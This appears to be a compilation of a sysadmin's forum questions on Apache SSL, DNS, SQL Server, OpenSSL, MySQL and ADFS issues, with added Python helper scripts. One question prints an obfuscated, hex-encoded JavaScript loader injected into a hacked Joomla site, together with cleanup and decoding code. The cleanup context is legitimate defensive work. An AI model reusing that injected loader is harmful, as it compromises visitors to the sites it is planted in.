We have a non-domain-joined SQL 2012 server running in Azure supporting several web sites. Earlier this week an issue popped up where domain-joined computers could not log in. There were no updates or changes applied to the server, no login errors, and Fiddler showed no issues. The user accounts were able to log in from outside the domain network.
Matt Bear's questions
I just configured the sites on my Windows Azure-hosted Ubuntu 12.04 Apache server to use SSL; the sites are working and redirecting correctly. Here is my virtual host configuration:
<VirtualHost *:80>
    ServerName site1.company.com
    # send every plain-HTTP request to the HTTPS site
    Redirect permanent / https://site1.company.com/
</VirtualHost>
<VirtualHost *:443>
    DocumentRoot /var/www/site1
    ServerName site1.company.com
    Options -Indexes
    DirectoryIndex login.php
    SSLEngine on
    SSLCertificateFile /etc/apache2/certs/company.com.crt
    SSLCertificateKeyFile /etc/apache2/certs/server1.key
    # intermediate CA bundle supplied by the certificate issuer
    SSLCertificateChainFile /etc/apache2/certs/gd_bundle.crt
</VirtualHost>
All virtual hosts are configured almost identically. However, I'm seeing a LOT of entries in Apache's error log that have me worried about performance/issues during production.
[debug] ssl_engine_kernel.c(1866): OpenSSL: Handshake: start
[debug] ssl_engine_kernel.c(1874): OpenSSL: Loop: before/accept initialization
[debug] ssl_engine_io.c(1908): OpenSSL: I/O error, 11 bytes expected to read on BIO#7f8f746c6ae0 [mem: 7f8f746cc0d0]
[debug] ssl_engine_kernel.c(1903): OpenSSL: Exit: error in unknown state
[info] [client x.x.x.x] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[info] [client x.x.x.x] Connection closed to child 5 with abortive shutdown (server site1.company.com:443)
[info] [client x.x.x.x] Connection to child 0 established (server site1.company.com:443)
[info] Seeding PRNG with 656 bytes of entropy
This loop repeats itself every 15 seconds. Have I misconfigured something? All sites work correctly without errors.
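As an added example, not part of the original question: the first thing to establish with a repeating handshake abort is whether it comes from one source on a clock or from many sources at random. This Python script tallies the "SSL handshake interrupted by system" entries in an Apache 2.2 error log per client address and measures the interval between them; a single address that reappears at a near-constant interval is the signature of a health check, uptime monitor or load-balancer probe that opens a TCP connection and closes it without sending a ClientHello, which is exactly what the (70014) end-of-file message at info level records. The log lines are constructed to match the 2.2 format with timestamps (the post's lines had theirs stripped), and the addresses 10.0.0.4 and 198.51.100.7 are placeholders, not hosts from the question.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample in Apache 2.2 error_log format. The post's lines had their
# timestamps stripped; these timestamps are made up to reproduce the 15-second
# cadence it describes. 10.0.0.4 and 198.51.100.7 are placeholder addresses.
SAMPLE_ERROR_LOG = """\
[Mon Jul 15 10:00:00 2013] [info] [client 10.0.0.4] Connection to child 0 established (server site1.company.com:443)
[Mon Jul 15 10:00:00 2013] [info] [client 10.0.0.4] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Mon Jul 15 10:00:00 2013] [info] [client 10.0.0.4] Connection closed to child 0 with abortive shutdown (server site1.company.com:443)
[Mon Jul 15 10:00:03 2013] [info] [client 198.51.100.7] Connection to child 1 established (server site1.company.com:443)
[Mon Jul 15 10:00:15 2013] [info] [client 10.0.0.4] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Mon Jul 15 10:00:30 2013] [info] [client 10.0.0.4] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Mon Jul 15 10:00:45 2013] [info] [client 10.0.0.4] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Mon Jul 15 10:00:52 2013] [info] [client 198.51.100.7] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
"""

# Apache 2.2 layout: [timestamp] [level] [client ip] message (2.4 appends :port to the ip)
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[0-9a-fA-F.:]+)\] (?P<msg>.*)$"
)
INTERRUPTED = "SSL handshake interrupted by system"


def parse_interrupted_handshakes(log_text):
    """Map each client address to the timestamps of its interrupted handshakes."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or INTERRUPTED not in m.group("msg"):
            continue
        ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
        by_client[m.group("ip")].append(ts)
    return dict(by_client)


def _gaps(stamps):
    """Seconds between consecutive events, in time order."""
    stamps = sorted(stamps)
    return [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]


def summarize(by_client):
    """Per client: event count and median seconds between events (None if only one)."""
    return {
        ip: {
            "count": len(stamps),
            "median_gap_s": statistics.median(_gaps(stamps)) if len(stamps) > 1 else None,
        }
        for ip, stamps in by_client.items()
    }


def likely_probes(by_client, min_count=3, max_jitter_s=2.0):
    """Clients whose interrupted handshakes recur on a near-constant interval.
    Browsers do not retry on a clock; health checks and uptime monitors do."""
    hits = []
    for ip, stamps in by_client.items():
        if len(stamps) < min_count:
            continue
        gaps = _gaps(stamps)
        med = statistics.median(gaps)
        if all(abs(g - med) <= max_jitter_s for g in gaps):
            hits.append(ip)
    return sorted(hits)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ERROR_LOG
    clients = parse_interrupted_handshakes(text)
    for ip, info in sorted(summarize(clients).items()):
        print(f"{ip:>16}  interrupted={info['count']:<4} median gap={info['median_gap_s']}s")
    print("periodic sources (probe-like):", ", ".join(likely_probes(clients)) or "none")
```

Run it against /var/log/apache2/error.log and compare the reported address with whatever is configured to check the server on port 443; if the periodic source is a probe you control, point it at a plain TCP check or a proper HTTPS request, and the info-level noise stops without touching the virtual hosts.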
I have several Windows Server 2008 R2 DC/DNS servers locally, RODCs at the remote office, and a Windows Server 2012 DC/DNS server on Azure with a VPN tunnel established.
Earlier today I moved a web server, changed the DNS records on one of the local DNS servers, and updated at the registrar. Everything worked as expected.
Then weird issues started popping up: some people being directed to the wrong server, others to the correct one.
After troubleshooting, I checked the local DNS server again and the records were still correct, until I hit refresh and the old A records popped up in conjunction with the new ones.
The way these records are set up is a forward lookup zone with one static A record using the parent domain for each zone.
So there ended up being two A records with different IPs for the URLs that I had changed earlier in the day, and the old records showed back up in DNS Manager when I refreshed the screen. (I had checked several times previously without refreshing.)
Fortunately this only affected internal users, and not all of them at that; all external users were unaffected because the public DNS records are published through a registrar (GoDaddy, independent, so unrelated).
What happened? And how can I prevent this from happening again?
We have been working on developing several SharePoint sites as a POC using the evaluation versions of SharePoint 2013 and SQL Server 2008 R2 Enterprise Evaluation. The POC worked and went into limited production; well, the SQL Server evaluation expiration date snuck up on me and it expired, so it's time to purchase ASAP.
Ideally, because of the new price models, I want to use SQL Server 2012 Standard, licensed by processor.
Now the question is, can I do an in-place upgrade from the expired SQL 2008 R2 trial directly to SQL 2012 Standard?
Or better yet, export the SharePoint databases from the expired trial so I can import them into a brand new SQL 2012 installation.
One of our old hosted Joomla sites suffered a JavaScript injection, and I'm going through cleaning it up. The following code was inserted into every .php or .js file:
<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";
#/0c0896#
?>
"exact syntax, though the actual code is MUCH longer, I cut a lot of hex from the middle to make it easier"
I am trying to use grep and sed to do a find and replace on all files, and I don't think I have my syntax for sed quite right.
# find files containing a slice of the hex payload, then delete the five-line marker block;
# the block spans lines, so sed has to join them with N before it can match and delete them
grep -rlZ "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs -0 sed -i '/^<?$/{N;/\n#0c0896#$/{N;N;N;d}}'
What I am going for here is to use grep to search all files for a snippet of the code, which is working, and then use sed to replace the tags #0c0896# and everything in between with nothing.
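As an added example that is not from the post: the marker block spans five lines, which is why a line-oriented sed expression cannot match it as a whole. The Python below does the same cleanup with a multi-line regular expression, reports per-file counts with a dry run by default so you can review before writing, and additionally decodes the loader's hex list so you can read what the injected script builds before deleting it (in the script bv=(5-3-1)=1 and each character is String.fromCharCode(eval("0x"+token) + 0xa - bv), i.e. token + 9). The sample file body is constructed from the post with the hex list cut short; the marker value 0c0896 is the one in the post, and the script file name in the usage comment is a placeholder.

```python
import re
from pathlib import Path
from typing import Optional

# The marker the injection wraps itself in, as shown in the post.
MARKER = "0c0896"

# The complete injected block: "<?", opening marker, the echo line, closing
# marker, "?>" and any whitespace after it. DOTALL lets ".*?" cross the line
# breaks that a line-at-a-time sed expression never sees.
INJECTION_RE = re.compile(
    r"<\?\s*#" + MARKER + r"#.*?#/" + MARKER + r"#\s*\?>\s*", re.DOTALL
)

# The loader keeps its real payload as comma-separated hex tokens in f="...";
# inside the PHP echo the quotes appear backslash-escaped, hence \\?
HEX_LIST_RE = re.compile(r'f=\\?"([0-9a-fA-F,]+)\\?"')

# Constructed file body in the shape the post shows, with the hex list cut short.
SAMPLE_INFECTED_FILE = (
    "<?\n"
    "#0c0896#\n"
    'echo " <script type=\\"text/javascript\\" language=\\"javascript\\" > '
    'bv=(5-3-1);aq=\\"0\\"+\\"x\\";sp=\\"spli\\"+\\"t\\";ff=String.fromCharCode;'
    '... f=\\"17,5d,6c,65,5a,6b,60,66,65\\"[sp](\\",\\"); ... za=e;za(s)}</script>";\n'
    "#/0c0896#\n"
    "?>\n"
    "<?php\n"
    "echo 'legitimate site code';\n"
)


def strip_injection(text):
    """Remove every marker block; returns (cleaned_text, blocks_removed)."""
    return INJECTION_RE.subn("", text)


def extract_hex_list(text) -> Optional[str]:
    """The f="..." hex list from an injected block, or None if absent."""
    m = HEX_LIST_RE.search(text)
    return m.group(1) if m else None


def decode_payload(hex_csv):
    """Undo the loader's encoding. In the script bv=(5-3-1)=1 and every character
    is String.fromCharCode(eval("0x"+token) + 0xa - bv), i.e. token + 9."""
    bv = 5 - 3 - 1
    return "".join(chr(int(tok, 16) + 0xA - bv) for tok in hex_csv.split(",") if tok.strip())


def clean_tree(root, suffixes=(".php", ".js"), dry_run=True):
    """Walk root, strip the block from matching files, return {path: blocks_removed}.
    Bytes are round-tripped with surrogateescape so non-UTF-8 files survive intact."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in suffixes:
            continue
        text = path.read_bytes().decode("utf-8", errors="surrogateescape")
        cleaned, n = strip_injection(text)
        if n:
            report[str(path)] = n
            if not dry_run:
                path.write_bytes(cleaned.encode("utf-8", errors="surrogateescape"))
    return report


if __name__ == "__main__":
    import sys
    # usage: python clean_injection.py /path/to/site [--apply]   (file name is a placeholder)
    print("decoded sample payload:", repr(decode_payload(extract_hex_list(SAMPLE_INFECTED_FILE))))
    if len(sys.argv) > 1:
        apply = "--apply" in sys.argv[2:]
        for p, n in sorted(clean_tree(sys.argv[1], dry_run=not apply).items()):
            print(f"{'cleaned' if apply else 'would clean'} {p}: {n} block(s)")
```

Take a backup before running with --apply, and after the cleanup keep looking: a loader like this is usually dropped by a separate PHP backdoor or a compromised FTP account, so removing the injected block from the site files without finding the entry point only buys time until the next write.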
We were recently forced to migrate our production cloud servers from GoDaddy to Azure because GoDaddy is ending their cloud server service.
One of our servers was a CentOS 5.7 server running a JasperReports Bitnami stack. During the migration process I upgraded all servers to the most recent distribution, and rebuilt Jasper from the Azure Bitnami Jasper image on Ubuntu 12.04 LTS.
I have the SSL certificate installed on the JasperServer and working correctly.
All the new servers are performing beautifully; now here's where the problem comes in.
We also have a dedicated CentOS 5.8 virtual server on GoDaddy which is staying there (for now); there is a collection of sites on said server which serve up reports from Jasper via SOAP.
However, it is getting handshake failures when attempting to connect:
#openssl s_client -connect newjasperserver.com:443
CONNECTED(00000003)
9092:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:583:
and:
#openssl version
OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
the new server is running:
#openssl version
OpenSSL 1.0.1c 10 May 2012
Now after a lot of research, it appears that there is an incompatibility between OpenSSL < 0.9.8k and OpenSSL 1.0.1.
The options I've identified are:
1. Migrate the server to a CentOS 6.4 server on Azure (ideal, but politically difficult; don't ask why).
2. Upgrade the server in place (unsupported, and I don't want to try it on a production server).
3. Wipe the server and rebuild it with 6.4 (a possibility, though if I do that, I will force option 1).
4. Remove OpenSSL from the server and install a newer version (once again, something I'm not comfortable with on a production server).
5. Install a second instance of OpenSSL (my #2 option, but I'm unsure how to proceed).
6. Install an alternative to OpenSSL (haven't even begun to look into this).
7. Disable enforced encryption on the Jasper server and allow connection via HTTP (this is looking like my best temporary fix until I can force that server to be migrated to Azure).
Are there any options I have missed? Is there a way on the Jasper side to allow connections from the older OpenSSL?
We have an Ubuntu 11.10 server that is running a LAMP stack; it was set up before I got here and no one knows what it's for. I have to migrate it or just shut it down, but I need to know what it's doing first.
Digging through it, there are no sites hosted off of it; however, there are several databases created in MySQL.
So it may be connected to one of our sites, but none of the devs here know.
What I need to do is view connection history on the MySQL databases so that I can find what, if anything, is connecting to them.
I am monitoring the process list and not seeing any active connections.
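As an added example, not part of the question: MySQL keeps no connection history by default, but the general query log records every Connect, Init DB and Query together with the client's user@host, so switching it on for a few days (SET GLOBAL general_log = 'ON'; the path is in general_log_file) captures exactly the clients an idle process list misses. The script below parses that file in the MySQL 5.1/5.5 format and lists, per user@host, how many times it connected, which databases it touched, when, and how many queries it ran, plus rejected logins. The log lines, hosts, users and databases are constructed and the version banner is illustrative; none of it comes from the server in the question.

```python
import re

# Constructed sample of a MySQL 5.1/5.5 general query log (log_output=FILE).
# Hosts, users, databases and the version banner are all made up.
SAMPLE_GENERAL_LOG = "\n".join([
    "/usr/sbin/mysqld, Version: 5.1 ((Ubuntu)). started with:",
    "Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock",
    "Time                 Id Command    Argument",
    "130715 10:00:01\t   12 Connect\twebapp@10.0.0.5 on shopdb",
    "\t\t   12 Query\tSELECT id, name FROM products LIMIT 10",
    "130715 10:00:02\t   12 Quit\t",
    "130715 10:05:00\t   13 Connect\tdebian-sys-maint@localhost on ",
    "\t\t   13 Query\tselect count(*) into @discard from `information_schema`.`TABLES`",
    "130715 10:05:00\t   13 Quit\t",
    "130715 10:30:17\t   14 Connect\twebapp@10.0.0.5 on shopdb",
    "\t\t   14 Init DB\treporting",
    "\t\t   14 Query\tSELECT COUNT(*) FROM orders",
    "130715 10:30:18\t   14 Quit\t",
    "130715 11:00:00\t   15 Connect\tAccess denied for user 'scanner'@'10.0.0.9' (using password: YES)",
])

# "YYMMDD HH:MM:SS<tab>  id Command<tab>argument"; the time is omitted on
# consecutive entries within the same second, leaving only the tabs.
LINE_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(?P<tid>\d+) "
    r"(?P<cmd>[A-Za-z][A-Za-z ]*?)(?:\t(?P<arg>.*))?$"
)
CONNECT_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>\S+)(?: as \S+)? on (?P<db>\S*)$")
DENIED_RE = re.compile(r"Access denied for user '([^']*)'@'([^']*)'")


def summarize_clients(log_text):
    """Return (clients, failed): clients maps (user, host) to connection count,
    databases used, first/last timestamp and query count; failed lists
    (user, host, timestamp) for rejected logins."""
    clients, threads, failed = {}, {}, []
    last_ts = None
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # server banner, column header, or a line we do not understand
        if m.group("ts"):
            last_ts = m.group("ts")
        tid, cmd, arg = int(m.group("tid")), m.group("cmd"), m.group("arg") or ""
        if cmd == "Connect":
            c = CONNECT_RE.match(arg)
            if not c:
                d = DENIED_RE.search(arg)
                failed.append((d.group(1), d.group(2), last_ts) if d else (arg, "", last_ts))
                continue
            key = (c.group("user"), c.group("host"))
            threads[tid] = key  # later lines carry only the thread id
            entry = clients.setdefault(key, {"connections": 0, "databases": set(),
                                             "first": last_ts, "last": last_ts, "queries": 0})
            entry["connections"] += 1
            entry["last"] = last_ts
            if c.group("db"):
                entry["databases"].add(c.group("db"))
        elif cmd == "Init DB" and tid in threads:
            clients[threads[tid]]["databases"].add(arg.strip())
        elif cmd == "Query" and tid in threads:
            clients[threads[tid]]["queries"] += 1
    return clients, failed


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GENERAL_LOG
    clients, failed = summarize_clients(text)
    for (user, host), e in sorted(clients.items()):
        dbs = ", ".join(sorted(e["databases"])) or "(none)"
        print(f"{user}@{host}: {e['connections']} connections, {e['queries']} queries, "
              f"databases {dbs}, between {e['first']} and {e['last']}")
    for user, host, ts in failed:
        print(f"FAILED login {user}@{host} at {ts}")
```

Two caveats: the general log writes every statement, including any passwords passed in plain SQL, so restrict the file's permissions and turn it off (SET GLOBAL general_log = 'OFF') once you have your answer; and a client that connects only monthly will not show up in a few days, so cross-check with the hosts allowed in mysql.user before deciding nothing uses the databases.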
Can I use a single ADFS server for both Office 365 and SharePoint SSO if they use different SSL certificates and domain names?
Environment consists of:
2 DCs -- ADFS server -- ADFS proxy -- SharePoint 2010 server (portal.companyname.com) -- hosted o365 (companynameMail.com)
o365 SSO is currently working flawlessly (after a LOT of work). I want to add SSO for our SharePoint server.
I'm unclear if it's possible, and stuck at adding a second SSL certificate on the ADFS server.
(And yes, I will be adding redundant servers as time and budget permit.)
One of our contractors just tried telling my boss that we should be using our Cisco ASA to serve DHCP instead of our DC... Is there any merit to this? Or is he just, once again, blowing smoke?
On shared folders on the file server, for the domain user name object under the Security tab, the icon has a red X.
There are no symptoms; the users have full access, there is just a red X on the icon for their name.
Why is this?
For clarification: logged into the Windows 2008 R2 file server, browse to a user's shared folder, right-click on the folder, hit Properties, click the Security tab. The object representing the user's domain name has a little red X on the lower right-hand corner of the icon that looks like a single man. There are no symptoms beyond me wondering why the red X is there.
Update: it does not show the X when you look at permissions from a workstation, only on the file server.
I have a user who is unable to access the file server from his workstation; his user account can access it from other machines, and I'm able to access it using my account on his computer.
I'm assuming it's a corrupted local profile? Normally I would just remove and recreate the profile, but... he's a developer with extensive settings stored in his programs, and it would take at least a day, possibly two, to recreate everything.
What can I do short of rebuilding his profile?
I'm just trying to find what takes precedence in loading a GPO.
Specifically, will drives map prior to scripts running?
I have an .exe in a network share that I'm running every time a user logs in, and I don't know if I should load it via the mapped drive or through the network path.
I've actually found the solution, but I'm trying to understand why it failed, and why my solution fixed the problem.
We have an application that uses forms authentication between a web server and a SQL server; the web server runs Server 2008, the SQL server runs 2008 R2 and SQL Server 2008.
In August the SQL server was patched with .NET 3.5.1; the web server was untouched, and the forms authentication continued to work.
One week ago we virtualized the web server onto our vSphere server because of failing hardware. Afterwards the forms authentication failed with event code 4005, detail code 50201, "The ticket supplied was invalid" (on the SQL server). In fact the SQL server started generating Schannel errors and began blue screening 3-4 times a day.
At this point I touched the SQL server for the first time (ever); the errors were non-specific, and any reference to them I could find had to do with either ZoneAlarm (which we don't run) or memory errors. So I applied Service Pack 1, which stopped the blue screening but did not fix the forms authentication.
At this point we had a workaround, so we put it on the back burner while we completed another project, and I was able to get back on it last night.
First thing was to adjust some code in the web.config file on the SQL server: nothing. Next was to regenerate and change out the machine key: still no change. Update the DNS servers: no change.
Finally I went through and installed all Windows updates, two reboots (over RDP I installed a network card driver which failed, and I did not have my server room key; that was fun).
After that, forms authentication was working again, and the SQL server stopped generating as many errors; I've gotten two Schannel errors since then.
In short, forms authentication began failing when the web server was cloned onto a virtual machine, which caused the SQL server to blue screen (?) and forms authentication to fail, and could only be fixed by applying patches to the SQL server? (I'm wishing I had patched the servers one at a time so I could know for sure which patch on which server fixed it.)
My question is: why did it fail, and why did patching fix it? I hate fixing something without fully understanding the why and how.
I need to add a site to Trusted Sites on all computers in my domain. I can do it with the "Site to Zone Assignment List"; however, when I do, it locks Trusted Sites on the client computer ("This setting is managed by your administrator"). What I need is a way to add the site, make it persistent, and not affect the users' ability to add trusted sites of their own. (It's a development environment; sites are created and tested regularly, and they need that ability.)
I am in the process of designing the group policies for my organization, and I'm wondering if there is somewhere I can go to look at templates, to see how other people have set theirs up, and even download templates to work off of.
I have ADFS and Office 365 completely set up and configured for SSO, using an ADFS server and ADFS proxy.
For internal users, I have IIS configured on the ADFS server to redirect companynamemail.com to http://Outlook.com/owa/companyname.com so that the users, instead of having to go through portal.microsoftonline.com, type in their user name, click the link, and then log in, just go to companynamemail.com and it performs the SSO.
I'm trying to find a way for external users to have a similar experience. I know that they will have to log in because they aren't authenticated through the domain, but I want their portal to be companynamemail.com. I tried using the ADFS proxy to do the HTTP redirect, but it forwards without allowing them to log in and gives an error.
I'm thinking about writing the redirect into the default website, but I'm wondering if I can do it with a redirect or an A/CNAME record.
I've been on the phone with Microsoft for over an hour trying to get a straight answer from them, and if I was set up to test this myself right now I could find out.
I'm deploying o365 SSO in stages by OU, dir sync is performed every 3 hours. I need to do a sync right away.
Will 'start-onlinecoexistencesync' only sync those users that have already been federated, or will it force a federation of all users?
So I'm working on bringing my company into the 21st century, with virtual servers, Active Directory, ADFS, SSO, etc. It's a huuuuge project, with a future goal of ISO 27001 certification.
The current question is: does the DirectAccess role offered by Server 2012 perform the same role as Forefront Unified Access Gateway 2010 does?
I'm sure there are many differences, but my primary concerns are SharePoint publishing, ADFS proxy, reverse proxy, remote connection, and o365 synchronization.
We are working on deploying ADFS for SSO with o365.
We have a consulting firm that handles our firewall configuration.
Today, while attempting to get them to set up a DMZ for me to install my ADFS proxy server in, the consultant attempted to convince me to just have them open up port 443 directly to the ADFS server and not use a proxy at all. He told me that such a configuration was standard practice now.
Because of the nature of our business, we have very stringent security requirements, including that no internal servers be opened up to the outside.
The question I have is: was he just blowing smoke because he was lazy and didn't want to configure the DMZ, or does he have a legitimate point?
My company is in the process of rolling out Active Directory enterprise-wide, with Office 365 synchronization, Lync, Exchange, and Outlook.
We currently have no AD (yet); there are 400+ users in 5 separate offices.
The quandary we are facing is whether we should initially deploy Windows Server 2012, or 2008R2.
Certain elements are afraid of unknown issues with 2012, and one of our contractors suggested that we use 2008 because it has a larger knowledge base.
I've done all my testing in 2012, and I know that either one will work for our purposes. It's a fairly simple deployment (2 DCs and 1 ADFS server).
We will also be adding WDS, WSUS, Sharepoint, and WebHelpDesk.
Is there any valid technical reason that we should not go with the latest available version, assuming this is a complete description of the environment, or any caveat with Windows Server 2012 that we should be aware of?